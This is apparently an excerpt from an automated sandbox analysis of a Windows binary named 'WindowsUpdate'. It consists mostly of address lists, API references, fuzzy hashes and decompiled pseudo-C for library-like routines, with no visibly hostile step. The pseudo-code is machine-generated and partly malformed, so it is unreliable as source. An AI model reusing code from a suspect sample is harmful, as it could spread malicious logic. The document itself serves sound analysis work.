                                                                                                                    0x002ce5fa
                                                                                                                    0x002ce5fe
                                                                                                                    0x002ce600
                                                                                                                    0x002ce616
                                                                                                                    0x002ce629
                                                                                                                    0x002ce63a
                                                                                                                    0x002ce64b
                                                                                                                    0x002ce650
                                                                                                                    0x002ce655
                                                                                                                    0x002ce7b0
                                                                                                                    0x002ce7b5
                                                                                                                    0x002ce7b8
                                                                                                                    0x002ce7ba
                                                                                                                    0x002ce7bc
                                                                                                                    0x002ce7c3
                                                                                                                    0x002ce7ca
                                                                                                                    0x002ce7d1
                                                                                                                    0x002ce7d1
                                                                                                                    0x002ce7d6
                                                                                                                    0x002ce7d6
                                                                                                                    0x002ce7d9
                                                                                                                    0x002ce7dc
                                                                                                                    0x002ce7e2
                                                                                                                    0x002ce7e2
                                                                                                                    0x002ce65b
                                                                                                                    0x002ce65b
                                                                                                                    0x002ce661
                                                                                                                    0x002ce667
                                                                                                                    0x002ce667
                                                                                                                    0x002ce669
                                                                                                                    0x002ce66a
                                                                                                                    0x002ce66e
                                                                                                                    0x002ce670
                                                                                                                    0x002ce78a
                                                                                                                    0x002ce78a
                                                                                                                    0x002ce791
                                                                                                                    0x002ce798
                                                                                                                    0x002ce676
                                                                                                                    0x002ce676
                                                                                                                    0x002ce67c
                                                                                                                    0x002ce67f
                                                                                                                    0x002ce67f
                                                                                                                    0x002ce681
                                                                                                                    0x002ce682
                                                                                                                    0x002ce686
                                                                                                                    0x002ce688
                                                                                                                    0x00000000
                                                                                                                    0x002ce6a0
                                                                                                                    0x002ce6a0
                                                                                                                    0x002ce6a6
                                                                                                                    0x002ce6a9
                                                                                                                    0x002ce6a9
                                                                                                                    0x002ce6ab
                                                                                                                    0x002ce6ac
                                                                                                                    0x002ce6b5
                                                                                                                    0x00000000
                                                                                                                    0x002ce6bb
                                                                                                                    0x002ce6cc
                                                                                                                    0x002ce6d1
                                                                                                                    0x002ce6d6
                                                                                                                    0x002ce6d9
                                                                                                                    0x002ce6db
                                                                                                                    0x002ce726
                                                                                                                    0x002ce727
                                                                                                                    0x002ce72c
                                                                                                                    0x002ce72d
                                                                                                                    0x002ce738
                                                                                                                    0x002ce739
                                                                                                                    0x002ce73e
                                                                                                                    0x002ce744
                                                                                                                    0x002ce75b
                                                                                                                    0x002ce772
                                                                                                                    0x002ce777
                                                                                                                    0x002ce77d
                                                                                                                    0x002ce782
                                                                                                                    0x002ce787
                                                                                                                    0x00000000
                                                                                                                    0x002ce6dd
                                                                                                                    0x002ce6e3
                                                                                                                    0x002ce6ea
                                                                                                                    0x002ce6f1
                                                                                                                    0x002ce6f8
                                                                                                                    0x002ce6f9
                                                                                                                    0x002ce6fe
                                                                                                                    0x002ce703
                                                                                                                    0x002ce706
                                                                                                                    0x002ce70d
                                                                                                                    0x002ce714
                                                                                                                    0x002ce714
                                                                                                                    0x002ce6db
                                                                                                                    0x002ce6b5
                                                                                                                    0x002ce688
                                                                                                                    0x002ce670
                                                                                                                    0x00000000
                                                                                                                    0x002ce602
                                                                                                                    0x002ce602
                                                                                                                    0x002ce609
                                                                                                                    0x002cea9d
                                                                                                                    0x002ceaa3
                                                                                                                    0x002ceaa6
                                                                                                                    0x002ceaae
                                                                                                                    0x002ceab2
                                                                                                                    0x002ceaba
                                                                                                                    0x002ceabc
                                                                                                                    0x002ceac0
                                                                                                                    0x002ceac1
                                                                                                                    0x002ceac2
                                                                                                                    0x002ceac3
                                                                                                                    0x002ceac4
                                                                                                                    0x002ceac5
                                                                                                                    0x002ceac6
                                                                                                                    0x002ceacc
                                                                                                                    0x002cead1
                                                                                                                    0x002cead4
                                                                                                                    0x002cead9
                                                                                                                    0x002ceade
                                                                                                                    0x002ceae3
                                                                                                                    0x002ceae3
                                                                                                                    0x002ceae5
                                                                                                                    0x002ceae7
                                                                                                                    0x002ceae7
                                                                                                                    0x002ceaee
                                                                                                                    0x002ceaf5
                                                                                                                    0x002ceafc
                                                                                                                    0x002ceb03
                                                                                                                    0x002ceb0a
                                                                                                                    0x002ceb11
                                                                                                                    0x002ceb18
                                                                                                                    0x002ceb20
                                                                                                                    0x002ceb27
                                                                                                                    0x002ceb30
                                                                                                                    0x002ceb35
                                                                                                                    0x002ceb3a
                                                                                                                    0x002ceb29
                                                                                                                    0x002ceb29
                                                                                                                    0x002ceb29
                                                                                                                    0x002ceb3f
                                                                                                                    0x002ceb44
                                                                                                                    0x002ceb49
                                                                                                                    0x002ceb4e
                                                                                                                    0x002ceb53
                                                                                                                    0x002ceb55
                                                                                                                    0x00000000
                                                                                                                    0x002ceb58
                                                                                                                    0x002ceb5e
                                                                                                                    0x002ce60f
                                                                                                                    0x002ce60f
                                                                                                                    0x00000000
                                                                                                                    0x002ce60f
                                                                                                                    0x002ce609
                                                                                                                    0x00000000
                                                                                                                    0x002cea48
                                                                                                                    0x002cea48
                                                                                                                    0x002cea54
                                                                                                                    0x002cea59
                                                                                                                    0x002cea5a
                                                                                                                    0x002cea5f
                                                                                                                    0x002cea62
                                                                                                                    0x002cea62
                                                                                                                    0x002cea6a
                                                                                                                    0x00000000
                                                                                                                    0x002cea6a
                                                                                                                    0x002ce5e0
                                                                                                                    0x002ce5c0
                                                                                                                    0x00000000

                                                                                                                    APIs
                                                                                                                    • __wfopen_s.LIBCMT ref: 002CE5A8
                                                                                                                    • _fgets.LIBCMT ref: 002CE5D6
                                                                                                                    • _strstr.LIBCMT ref: 002CE64B
                                                                                                                    • _wprintf.LIBCMT ref: 002CE6FE
                                                                                                                    • _fprintf.LIBCMT ref: 002CE72D
                                                                                                                    • _fprintf.LIBCMT ref: 002CE744
                                                                                                                      • Part of subcall function 003292CF: __lock_file.LIBCMT ref: 00329316
                                                                                                                      • Part of subcall function 003292CF: __stbuf.LIBCMT ref: 0032939B
                                                                                                                      • Part of subcall function 003292CF: __ftbuf.LIBCMT ref: 003293B7
                                                                                                                      • Part of subcall function 003293E1: __vfwprintf_l.LIBCMT ref: 003293F0
                                                                                                                    • _fgets.LIBCMT ref: 002CEA5A
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000C.00000002.333085217.00000000002C2000.00000002.00000001.01000000.00000008.sdmp, Offset: 002C0000, based on PE: true
                                                                                                                    • Associated: 0000000C.00000002.333073063.00000000002C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_12_2_2c0000_WindowsUpdate.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: _fgets_fprintf$__ftbuf__lock_file__stbuf__vfwprintf_l__wfopen_s_strstr_wprintf
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2011453255-0
                                                                                                                    • Opcode ID: e0f2eb0771321eaa3f37b203fa31ef19375705b1c427191b4a91fdcd7f1b31b7
                                                                                                                    • Instruction ID: 2200ccbdf6dfb686f0ecd4dd496dade861fd7a3349173c88f0382de67e82178d
                                                                                                                    • Opcode Fuzzy Hash: e0f2eb0771321eaa3f37b203fa31ef19375705b1c427191b4a91fdcd7f1b31b7
                                                                                                                    • Instruction Fuzzy Hash: 8C814B7095035A9ECF11EFA0DC46FEE7768AF10304F0446EDFA49A7042EA768B998F51
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 0030AA87 Relevance: 10.8, APIs: 4, Strings: 2, Instructions: 328COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 99%
                                                                                                                    			E0030AA87(signed int _a4, intOrPtr* _a8, signed int _a12, intOrPtr _a16, signed int _a20, signed int _a24) {
				signed short _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				intOrPtr _v32;
				intOrPtr _t116;
				intOrPtr* _t118;
				signed int _t132;
				signed int _t135;
				signed int _t146;
				signed int _t147;
				signed int _t148;
				intOrPtr _t153;
				signed short _t161;
				signed int _t174;
				signed int _t175;
				char* _t182;
				signed int _t183;
				signed int _t184;
				unsigned int _t186;
				intOrPtr _t191;
				intOrPtr _t192;
				intOrPtr _t193;
				intOrPtr _t194;
				intOrPtr _t195;
				char* _t196;
				short _t197;
				signed int _t199;
				intOrPtr _t200;
				intOrPtr* _t201;
				char _t204;
				void* _t205;
				intOrPtr _t206;
				signed int _t207;
				intOrPtr* _t208;
				signed int _t209;
				intOrPtr _t210;
				intOrPtr* _t211;
				signed int _t212;
				char* _t213;
				void* _t217;
				void* _t218;
				void* _t220;
				void* _t221;

				_t186 = _a20;
				_v24 = 0;
				_v12 = 0;
				_t207 = _a4;
				_v28 =  !_t186 & 0x00000001;
				_t116 =  *((intOrPtr*)(_t207 + 4));
				_t209 = 0;
				_t182 = 0;
				_v20 = 0;
				_a20 = _t186 >> 0x00000001 & 0x00000001;
				_v8 = 0x400;
				if(_t116 <= 0x28) {
					_v16 = 0x28;
				} else {
					_v16 = _t116 + 0x00000007 & 0xfffffff8;
				}
				 *_a8 = _t182;
				_t118 = _a12;
				if(_t118 == 0 ||  *_t118 == _t182) {
					L23:
					_v32 = ( *((intOrPtr*)(_t207 + 4)) + 0x00000007 & 0xfffffff8) + (_v16 + _t209) * 2 + 0xea;
					_t208 = E003091B7(( *((intOrPtr*)(_t207 + 4)) + 0x00000007 & 0xfffffff8) + (_v16 + _t209) * 2 + 0xea);
					_t218 = _t217 + 4;
					if(_t208 == 0) {
						E002D7247(_t182);
						goto L52;
					} else {
						E00327C87(_t208, 0, _v32);
						_t34 = _t208 + 0xb0; // 0xb0
						_t191 = _t34;
						 *((intOrPtr*)(_t208 + 0xa8)) = _t191;
						_t192 = _t191 + 0x30;
						 *((intOrPtr*)(_t208 + 0x38)) = _t192;
						_t193 = _t192 + ( *((intOrPtr*)(_a4 + 4)) + 0x00000007 & 0xfffffff8);
						 *((intOrPtr*)(_t208 + 0x40)) = _t193;
						_t194 = _t193 + _v16;
						_t220 = _t218 + 0xc;
						 *((intOrPtr*)(_t208 + 0x3c)) = _t194;
						_t195 = _t194 + _v16;
						 *((intOrPtr*)(_t208 + 0x84)) = _t195;
						if(_t182 != 0) {
							_t43 = _t195 + 1; // 0x29
							 *((intOrPtr*)(_t208 + 0x88)) = _t43 + _t209;
							E00327337(_t195, _t182, _t209);
							E00327337( *((intOrPtr*)(_t208 + 0x88)), _t182, _t209);
							_t200 =  *((intOrPtr*)(_t208 + 0x88));
							 *((intOrPtr*)(_t209 + _t200)) =  *0x476244;
							 *((intOrPtr*)(_t209 + _t200 + 4)) =  *0x476248;
							E002D7247(_t182);
							_t220 = _t220 + 0x1c;
						}
						_t196 = _a12;
						_t132 = _a4;
						_t183 = _a24;
						 *_t208 = _t132;
						 *(_t208 + 0x78) = _t183;
						if(_t196 == 0 ||  *_t196 == 0 || _v12 != 0) {
							_v24 = 1;
							 *((char*)(_t208 + 0xe)) = 4;
							_t184 = _t183 & 0x00000001;
							goto L36;
						} else {
							_a4 = 0;
							_t199 =  *((intOrPtr*)( *((intOrPtr*)(_t132 + 0x18))))(_t132,  *((intOrPtr*)(_t208 + 0x84)),  *((intOrPtr*)(_t208 + 0x38)), _t183,  &_a4);
							_t221 = _t220 + 0x14;
							_t184 = _a4 & 0x00000001;
							_a12 = _t199;
							if(_t199 != 0) {
								L37:
								_t211 =  *((intOrPtr*)(_t208 + 0x38));
								_t153 =  *_t211;
								if(_t153 != 0) {
									 *((intOrPtr*)( *((intOrPtr*)(_t153 + 4))))(_t211);
									_t221 = _t221 + 4;
									 *_t211 = 0;
								}
								E002D7247(_t208);
								return _a12;
							} else {
								if(_t184 == 0) {
									E002F5FA7(_t208);
									_t161 =  *(_t208 + 0x70);
									_t220 = _t221 + 4;
									if(_t161 > 0x400) {
										if(_t161 <= 0x2000) {
											_v8 = _t161 & 0x0000ffff;
										} else {
											_v8 = 0x2000;
										}
									}
								}
								L36:
								_t135 = E0030B197(_t208,  &_v8, 0xffffffff);
								_t221 = _t220 + 0xc;
								_a12 = _t135;
								if(_t135 == 0) {
									_t210 =  *((intOrPtr*)(_t208 + 0xa8));
									_a4 = _a16 + 0x00000007 & 0xfffffff8;
									E00327C87(_t210, 0, 0x30);
									_t204 = _v12;
									_t197 = _a4;
									 *(_t210 + 0x14) = _v8 & 0x0000ffff;
									_a4 = 0x424650;
									 *((intOrPtr*)(_t210 + 0x18)) = _t197;
									 *((intOrPtr*)(_t210 + 0x24)) = _t208;
									 *((intOrPtr*)(_t210 + 0x10)) = 0x64;
									 *(_t210 + 0x1c) = 0 | _t204 == 0x00000000;
									_t144 =  ==  ? _a4 : 0;
									 *((intOrPtr*)(_t210 + 0x20)) =  ==  ? _a4 : 0;
									 *((char*)(_t208 + 6)) = _v28;
									if(_a20 == 0 || _t184 == 0) {
										_t146 = 0;
									} else {
										_t146 = 1;
									}
									 *(_t208 + 7) = _t146;
									_t147 = _v24;
									 *((char*)(_t208 + 0x15)) = _t204;
									 *((intOrPtr*)(_t208 + 0x80)) = 0x3fffffff;
									 *(_t208 + 0xb) = _t147;
									 *(_t208 + 4) = _t147;
									 *(_t208 + 0x12) = _t147;
									 *((char*)(_t208 + 0xd)) = _t204;
									 *(_t208 + 0xc) = _t184;
									if(_t147 != 0 || _v28 == 0) {
										_t148 = 1;
									} else {
										_t148 = 0;
									}
									 *(_t208 + 8) = _t148;
									 *((char*)(_t208 + 9)) = _t148 & 0xffffff00 | _t148 == 0x00000000;
									 *((char*)(_t208 + 0xa)) = 2;
									 *((short*)(_t208 + 0x74)) = _t197;
									 *((intOrPtr*)(_t208 + 0xa0)) = 0xffffffff;
									 *((intOrPtr*)(_t208 + 0xa4)) = 0xffffffff;
									E002F5FA7(_t208);
									if(_v12 != 0) {
										 *((char*)(_t208 + 5)) = 4;
									}
									 *_a8 = _t208;
									return 0;
								} else {
									goto L37;
								}
							}
						}
					}
				} else {
					_v32 =  *((intOrPtr*)(_t207 + 8)) + 1;
					_t182 = E003091B7( *((intOrPtr*)(_t207 + 8)) + 1 +  *((intOrPtr*)(_t207 + 8)) + 1);
					_t217 = _t217 + 4;
					if(_t182 == 0) {
						L52:
						return 7;
					} else {
						_t212 = _a12;
						_t201 = 0x476238;
						_t174 = _t212;
						while(1) {
							_t205 =  *_t174;
							if(_t205 !=  *_t201) {
								break;
							}
							if(_t205 == 0) {
								L11:
								_t175 = 0;
							} else {
								_t206 =  *((intOrPtr*)(_t174 + 1));
								if(_t206 !=  *((intOrPtr*)(_t201 + 1))) {
									break;
								} else {
									_t174 = _t174 + 2;
									_t201 = _t201 + 2;
									if(_t206 != 0) {
										continue;
									} else {
										goto L11;
									}
								}
							}
							L13:
							 *_t182 = 0;
							if(_t175 != 0) {
								_t175 =  *((intOrPtr*)( *((intOrPtr*)(_t207 + 0x24))))(_t207, _t212, _v32, _t182);
								_t217 = _t217 + 0x10;
								_v20 = _t175;
							} else {
								_v12 = 1;
							}
							_t213 = _t182;
							if( *_t182 != 0) {
								do {
									_t213 = _t213 + 1;
								} while ( *_t213 != 0);
							}
							_t209 = _t213 - _t182 & 0x3fffffff;
							if(_t175 != 0) {
								E002D7247(_t182);
								return _v20;
							} else {
								_t24 = _t209 + 8; // 0x9
								if(_t24 <=  *((intOrPtr*)(_t207 + 8))) {
									goto L23;
								} else {
									E002D7247(_t182);
									return 0xe;
								}
							}
							goto L53;
						}
						asm("sbb eax, eax");
						_t175 = _t174 | 0x00000001;
						goto L13;
					}
				}
				L53:
			}

















































                                                                                                                    0x0030aa8d
                                                                                                                    0x0030aa92
                                                                                                                    0x0030aa95
                                                                                                                    0x0030aaa2
                                                                                                                    0x0030aaa7
                                                                                                                    0x0030aaaa
                                                                                                                    0x0030aaad
                                                                                                                    0x0030aab2
                                                                                                                    0x0030aab4
                                                                                                                    0x0030aab7
                                                                                                                    0x0030aaba
                                                                                                                    0x0030aac4
                                                                                                                    0x0030aad1
                                                                                                                    0x0030aac6
                                                                                                                    0x0030aacc
                                                                                                                    0x0030aacc
                                                                                                                    0x0030aadb
                                                                                                                    0x0030aadd
                                                                                                                    0x0030aae2
                                                                                                                    0x0030abad
                                                                                                                    0x0030abc4
                                                                                                                    0x0030abcc
                                                                                                                    0x0030abce
                                                                                                                    0x0030abd3
                                                                                                                    0x0030ae11
                                                                                                                    0x00000000
                                                                                                                    0x0030abd9
                                                                                                                    0x0030abdf
                                                                                                                    0x0030abe7
                                                                                                                    0x0030abe7
                                                                                                                    0x0030abed
                                                                                                                    0x0030abf3
                                                                                                                    0x0030abf6
                                                                                                                    0x0030ac02
                                                                                                                    0x0030ac04
                                                                                                                    0x0030ac07
                                                                                                                    0x0030ac0a
                                                                                                                    0x0030ac0d
                                                                                                                    0x0030ac10
                                                                                                                    0x0030ac13
                                                                                                                    0x0030ac1b
                                                                                                                    0x0030ac1e
                                                                                                                    0x0030ac25
                                                                                                                    0x0030ac2b
                                                                                                                    0x0030ac38
                                                                                                                    0x0030ac3d
                                                                                                                    0x0030ac48
                                                                                                                    0x0030ac51
                                                                                                                    0x0030ac55
                                                                                                                    0x0030ac5a
                                                                                                                    0x0030ac5a
                                                                                                                    0x0030ac5d
                                                                                                                    0x0030ac60
                                                                                                                    0x0030ac63
                                                                                                                    0x0030ac66
                                                                                                                    0x0030ac68
                                                                                                                    0x0030ac6d
                                                                                                                    0x0030acdb
                                                                                                                    0x0030acde
                                                                                                                    0x0030ace2
                                                                                                                    0x00000000
                                                                                                                    0x0030ac7a
                                                                                                                    0x0030ac82
                                                                                                                    0x0030ac98
                                                                                                                    0x0030ac9a
                                                                                                                    0x0030ac9d
                                                                                                                    0x0030aca0
                                                                                                                    0x0030aca5
                                                                                                                    0x0030acfa
                                                                                                                    0x0030acfa
                                                                                                                    0x0030acfd
                                                                                                                    0x0030ad01
                                                                                                                    0x0030ad07
                                                                                                                    0x0030ad09
                                                                                                                    0x0030ad0c
                                                                                                                    0x0030ad0c
                                                                                                                    0x0030ad13
                                                                                                                    0x0030ad24
                                                                                                                    0x0030aca7
                                                                                                                    0x0030aca9
                                                                                                                    0x0030acac
                                                                                                                    0x0030acb1
                                                                                                                    0x0030acb4
                                                                                                                    0x0030acbc
                                                                                                                    0x0030acc3
                                                                                                                    0x0030acd1
                                                                                                                    0x0030acc5
                                                                                                                    0x0030acc5
                                                                                                                    0x0030acc5
                                                                                                                    0x0030acc3
                                                                                                                    0x0030acbc
                                                                                                                    0x0030ace4
                                                                                                                    0x0030aceb
                                                                                                                    0x0030acf0
                                                                                                                    0x0030acf3
                                                                                                                    0x0030acf8
                                                                                                                    0x0030ad28
                                                                                                                    0x0030ad39
                                                                                                                    0x0030ad3c
                                                                                                                    0x0030ad45
                                                                                                                    0x0030ad48
                                                                                                                    0x0030ad4b
                                                                                                                    0x0030ad58
                                                                                                                    0x0030ad5f
                                                                                                                    0x0030ad62
                                                                                                                    0x0030ad65
                                                                                                                    0x0030ad6c
                                                                                                                    0x0030ad73
                                                                                                                    0x0030ad7b
                                                                                                                    0x0030ad81
                                                                                                                    0x0030ad84
                                                                                                                    0x0030ad91
                                                                                                                    0x0030ad8a
                                                                                                                    0x0030ad8a
                                                                                                                    0x0030ad8a
                                                                                                                    0x0030ad93
                                                                                                                    0x0030ad96
                                                                                                                    0x0030ad99
                                                                                                                    0x0030ad9c
                                                                                                                    0x0030ada6
                                                                                                                    0x0030ada9
                                                                                                                    0x0030adac
                                                                                                                    0x0030adaf
                                                                                                                    0x0030adb2
                                                                                                                    0x0030adb7
                                                                                                                    0x0030adc3
                                                                                                                    0x0030adbf
                                                                                                                    0x0030adbf
                                                                                                                    0x0030adbf
                                                                                                                    0x0030adca
                                                                                                                    0x0030add1
                                                                                                                    0x0030add4
                                                                                                                    0x0030add8
                                                                                                                    0x0030addc
                                                                                                                    0x0030ade6
                                                                                                                    0x0030adf0
                                                                                                                    0x0030adfc
                                                                                                                    0x0030adfe
                                                                                                                    0x0030adfe
                                                                                                                    0x0030ae05
                                                                                                                    0x0030ae0f
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x0030acf8
                                                                                                                    0x0030aca5
                                                                                                                    0x0030ac6d
                                                                                                                    0x0030aaf0
                                                                                                                    0x0030aaf4
                                                                                                                    0x0030aaff
                                                                                                                    0x0030ab01
                                                                                                                    0x0030ab06
                                                                                                                    0x0030ae1b
                                                                                                                    0x0030ae24
                                                                                                                    0x0030ab0c
                                                                                                                    0x0030ab0c
                                                                                                                    0x0030ab0f
                                                                                                                    0x0030ab14
                                                                                                                    0x0030ab17
                                                                                                                    0x0030ab17
                                                                                                                    0x0030ab1b
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x0030ab1f
                                                                                                                    0x0030ab33
                                                                                                                    0x0030ab33
                                                                                                                    0x0030ab21
                                                                                                                    0x0030ab21
                                                                                                                    0x0030ab27
                                                                                                                    0x00000000
                                                                                                                    0x0030ab29
                                                                                                                    0x0030ab29
                                                                                                                    0x0030ab2c
                                                                                                                    0x0030ab31
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x0030ab31
                                                                                                                    0x0030ab27
                                                                                                                    0x0030ab3c
                                                                                                                    0x0030ab3c
                                                                                                                    0x0030ab41
                                                                                                                    0x0030ab55
                                                                                                                    0x0030ab57
                                                                                                                    0x0030ab5a
                                                                                                                    0x0030ab43
                                                                                                                    0x0030ab43
                                                                                                                    0x0030ab43
                                                                                                                    0x0030ab60
                                                                                                                    0x0030ab62
                                                                                                                    0x0030ab67
                                                                                                                    0x0030ab67
                                                                                                                    0x0030ab68
                                                                                                                    0x0030ab67
                                                                                                                    0x0030ab6f
                                                                                                                    0x0030ab77
                                                                                                                    0x0030ab9c
                                                                                                                    0x0030abac
                                                                                                                    0x0030ab79
                                                                                                                    0x0030ab79
                                                                                                                    0x0030ab7f
                                                                                                                    0x00000000
                                                                                                                    0x0030ab81
                                                                                                                    0x0030ab87
                                                                                                                    0x0030ab97
                                                                                                                    0x0030ab97
                                                                                                                    0x0030ab7f
                                                                                                                    0x00000000
                                                                                                                    0x0030ab77
                                                                                                                    0x0030ab37
                                                                                                                    0x0030ab39
                                                                                                                    0x00000000
                                                                                                                    0x0030ab39
                                                                                                                    0x0030ab06
                                                                                                                    0x00000000

                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000C.00000002.333085217.00000000002C2000.00000002.00000001.01000000.00000008.sdmp, Offset: 002C0000, based on PE: true
                                                                                                                    • Associated: 0000000C.00000002.333073063.00000000002C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_12_2_2c0000_WindowsUpdate.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: 8bG$PFB
                                                                                                                    • API String ID: 0-3557998757
                                                                                                                    • Opcode ID: 0b749eba8c1860d0a13bccc6fc644d1c1d32429c8aa3b7bfa15f5c639c85171f
                                                                                                                    • Instruction ID: 1d73a71089fcacf0508b1d7b2486303b0489a078355d2c7b94a3d843f697f8d9
                                                                                                                    • Opcode Fuzzy Hash: 0b749eba8c1860d0a13bccc6fc644d1c1d32429c8aa3b7bfa15f5c639c85171f
                                                                                                                    • Instruction Fuzzy Hash: 8CC116B1A01B46AFDB11CF68D890BAABBE0FF15310F048269E859C7781D335E954CB92
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 002CBF57 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 162COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000C.00000002.333085217.00000000002C2000.00000002.00000001.01000000.00000008.sdmp, Offset: 002C0000, based on PE: true
                                                                                                                    • Associated: 0000000C.00000002.333073063.00000000002C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_12_2_2c0000_WindowsUpdate.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: ___from_strstr_to_strchrswprintf$_strstr
                                                                                                                    • String ID: J
                                                                                                                    • API String ID: 2779265039-1141589763
                                                                                                                    • Opcode ID: 1bde665119345f048591d14e3dffabe9f1a5492d805b2cbac27908dc58dc2e5c
                                                                                                                    • Instruction ID: d06f452407e2f4c66c73706ea08c172509138da1baf81b18fdc09a12ae9570a5
                                                                                                                    • Opcode Fuzzy Hash: 1bde665119345f048591d14e3dffabe9f1a5492d805b2cbac27908dc58dc2e5c
                                                                                                                    • Instruction Fuzzy Hash: 04518171A001689BDB21DF94DC42FEA73B8BF04700F1401E9F64DEB252EAB1AA958F55
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 0035121C Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 158COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • swprintf.LIBCMT ref: 0035132B
                                                                                                                    • ___from_strstr_to_strchr.LIBCMT ref: 00351339
                                                                                                                    • _wprintf.LIBCMT ref: 003513C7
                                                                                                                    • _fprintf.LIBCMT ref: 003513DE
                                                                                                                    • _fprintf.LIBCMT ref: 003513F5
                                                                                                                      • Part of subcall function 003ADBDE: __lock_file.LIBCMT ref: 003ADC25
                                                                                                                      • Part of subcall function 003ADBDE: __stbuf.LIBCMT ref: 003ADCAA
                                                                                                                      • Part of subcall function 003ADBDE: __ftbuf.LIBCMT ref: 003ADCC6
                                                                                                                      • Part of subcall function 003ADCF0: __vfwprintf_l.LIBCMT ref: 003ADCFF
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000C.00000002.333085217.00000000002C2000.00000002.00000001.01000000.00000008.sdmp, Offset: 002C0000, based on PE: true
                                                                                                                    • Associated: 0000000C.00000002.333073063.00000000002C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_12_2_2c0000_WindowsUpdate.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: _fprintf$___from_strstr_to_strchr__ftbuf__lock_file__stbuf__vfwprintf_l_wprintfswprintf
                                                                                                                    • String ID: J
                                                                                                                    • API String ID: 2936582493-1141589763
                                                                                                                    • Opcode ID: da42587fde30b7eb313773d5b16a5c90e60bbd40a8e1fdb6fa5b87cb5f0714d8
                                                                                                                    • Instruction ID: 72a71ce7cbc7a82b8c66648f77e722ccd633a62117b59c54e5838135081f9d96
                                                                                                                    • Opcode Fuzzy Hash: da42587fde30b7eb313773d5b16a5c90e60bbd40a8e1fdb6fa5b87cb5f0714d8
                                                                                                                    • Instruction Fuzzy Hash: 6451C4B1A402589FCB11DB54CD42FEDB3BCEB49702F1104A6E90DAB161EBB1AE848F55
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 003ADD09 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 81COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 95%
                                                                                                                    			E003ADD09(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				void* _t41;
				signed int _t47;
				void* _t48;
				intOrPtr _t54;
				signed int _t60;
				void* _t61;
				intOrPtr _t65;
				void* _t68;

				_push(0x10);
				_push(0x480d30);
				E003B28FC(__ebx, __edi, __esi);
				if((0 |  *((intOrPtr*)(_t68 + 8)) != 0x00000000) != 0) {
					_t65 =  *((intOrPtr*)(_t68 + 0xc));
					_t65 = _t65 != 0;
					if(_t65 != 0) {
						goto L1;
					} else {
						__eflags =  *(_t65 + 0xc) & 0x00000040;
						if(( *(_t65 + 0xc) & 0x00000040) != 0) {
							L14:
							_t54 = E003B3BCC( *((intOrPtr*)(_t68 + 8)));
							 *((intOrPtr*)(_t68 - 0x1c)) = _t54;
							E003B2C8C(_t65);
							 *(_t68 - 4) =  *(_t68 - 4) & 0x00000000;
							_t41 = E003B2B22(_t54, __eflags, _t65);
							 *((intOrPtr*)(_t68 - 0x20)) = E003B3A6D( *((intOrPtr*)(_t68 + 8)), 1, _t54, _t65);
							E003B2AF1(_t41, _t65);
							 *(_t68 - 4) = 0xfffffffe;
							E003ADE07(_t65);
							__eflags =  *((intOrPtr*)(_t68 - 0x20)) - _t54;
							_t37 = (__eflags == 0) - 1;
							__eflags = (__eflags == 0) - 1;
						} else {
							_t47 = E003B2BC8(_t65);
							_t60 = _t47;
							__eflags = _t60 - 0xffffffff;
							if(_t60 == 0xffffffff) {
								L7:
								_t48 = 0x483640;
							} else {
								__eflags = _t60 - 0xfffffffe;
								if(_t60 == 0xfffffffe) {
									goto L7;
								} else {
									_t48 = ((_t47 & 0x0000001f) << 6) +  *((intOrPtr*)(0x48b030 + (_t60 >> 5) * 4));
								}
							}
							__eflags =  *(_t48 + 0x24) & 0x0000007f;
							if(( *(_t48 + 0x24) & 0x0000007f) != 0) {
								goto L1;
							} else {
								__eflags = _t60 - 0xffffffff;
								if(_t60 == 0xffffffff) {
									L12:
									_t61 = 0x483640;
								} else {
									__eflags = _t60 - 0xfffffffe;
									if(_t60 == 0xfffffffe) {
										goto L12;
									} else {
										_t61 = ((_t60 & 0x0000001f) << 6) +  *((intOrPtr*)(0x48b030 + (_t60 >> 5) * 4));
									}
								}
								__eflags =  *(_t61 + 0x24) & 0x00000080;
								if(( *(_t61 + 0x24) & 0x00000080) != 0) {
									goto L1;
								} else {
									goto L14;
								}
							}
						}
					}
				} else {
					L1:
